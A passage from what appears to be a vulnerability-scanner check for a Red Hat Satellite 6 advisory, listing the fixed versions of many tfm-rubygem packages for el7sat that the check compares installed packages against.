'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_discovery-16.3.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_hooks-0.3.17-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_kubevirt-0.1.8-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_leapp-0.1.6-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_openscap-4.1.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_remote_execution-4.2.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_remote_execution-cockpit-4.2.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_remote_execution_core-1.4.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_rh_cloud-3.0.18.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_templates-9.0.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_theme_satellite-7.0.1.5-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_virt_who_configure-0.5.5-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-formatador-0.2.1-11.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-friendly_id-5.3.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-fx-0.5.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-get_process_mem-0.2.1-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-gettext-3.1.4-10.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-git-1.5.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-gitlab-sidekiq-fetcher-0.6.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-globalid-0.4.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-google-api-client-0.33.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-google-cloud-env-1.3.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-googleauth-0.13.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-graphql-1.8.14-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-graphql-batch-0.3.10-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-gssapi-1.2.0-6.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli-2.3.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman-2.3.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_docker-0.0.7-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_openscap-0.1.12-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_remote_execution-0.2.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_tasks-0.0.15-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.7-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hammer_cli_katello-0.24.0.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-hashie-3.6.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-highline-1.7.8-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-http-3.3.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-http-cookie-1.0.2-5.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-http-form_data-2.1.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-http_parser.rb-0.6.0-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-httpclient-2.8.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-i18n-1.8.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-infoblox-3.0.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-ipaddress-0.8.0-11.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-jgrep-1.3.3-12.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-journald-logger-2.0.4-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-journald-native-1.0.11-2.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-jwt-2.2.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-kafo-6.2.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-kafo_parsers-1.1.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-kafo_wizards-0.0.1-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-katello-3.18.1.22-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-kubeclient-4.3.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-ldap_fluff-0.4.7-5.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-little-plugger-1.1.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-locale-2.0.9-13.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-logging-2.3.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-logging-journald-2.0.0-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-loofah-2.4.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-mail-2.7.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-marcel-0.3.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-memoist-0.16.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-method_source-0.9.2-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-mime-types-3.2.2-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-mimemagic-0.3.5-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-mini_mime-1.0.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-mini_portile2-2.4.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-ms_rest-0.7.4-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-ms_rest_azure-0.11.1-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-multi_json-1.14.1-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-multipart-post-2.0.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-mustermann-1.0.2-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-net-ldap-0.16.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-net-ping-2.0.1-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-net-scp-1.2.1-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-net-ssh-4.2.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-netrc-0.11.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-newt-0.9.7-2.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-nio4r-2.5.4-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-nokogiri-1.10.9-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-oauth-0.5.4-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-openscap-0.4.9-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-optimist-3.0.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-os-1.0.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-ovirt-engine-sdk-4.3.0-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-parse-cron-0.1.4-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-passenger-4.0.18-26.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-passenger-native-4.0.18-26.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-passenger-native-libs-4.0.18-26.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-pg-1.1.4-2.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-polyglot-0.3.5-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-powerbar-2.0.1-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-prometheus-client-1.0.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-promise.rb-0.7.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-public_suffix-3.0.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-pulp_2to3_migration_client-0.7.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-pulp_ansible_client-0.4.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-pulp_certguard_client-1.0.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-pulp_container_client-2.1.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-pulp_deb_client-2.7.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-pulp_file_client-1.3.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-pulp_rpm_client-3.9.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-pulpcore_client-3.7.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-puma-4.3.6-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-quantile-0.2.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rabl-0.14.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rack-2.2.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rack-cors-1.0.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rack-jsonp-1.3.1-9.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rack-protection-2.0.3-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rack-test-1.1.0-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rails-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rails-dom-testing-2.0.3-6.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rails-i18n-6.0.0-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-railties-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rainbow-2.2.1-5.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rb-inotify-0.9.7-5.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rbovirt-0.1.7-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rbvmomi-2.2.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-record_tag_helper-1.0.1-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-recursive-open-struct-1.1.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-redfish_client-0.5.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-redhat_access-2.2.19-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-redhat_access_lib-1.1.5-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-redis-4.1.2-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-representable-3.0.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-responders-3.0.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rest-client-2.0.2-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-retriable-3.1.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rkerberos-0.1.5-18.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-roadie-3.4.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-roadie-rails-2.1.1-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-robotex-1.0.0-21.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rsec-0.4.3-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-ruby-libvirt-0.7.1-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-ruby2ruby-2.4.2-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-ruby_parser-3.10.1-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-rubyipmi-0.10.0-6.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-runcible-2.13.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-safemode-1.3.6-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-scoped_search-4.1.9-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-sd_notify-0.1.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-secure_headers-6.3.0-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-sequel-5.7.1-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-server_sent_events-0.1.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n 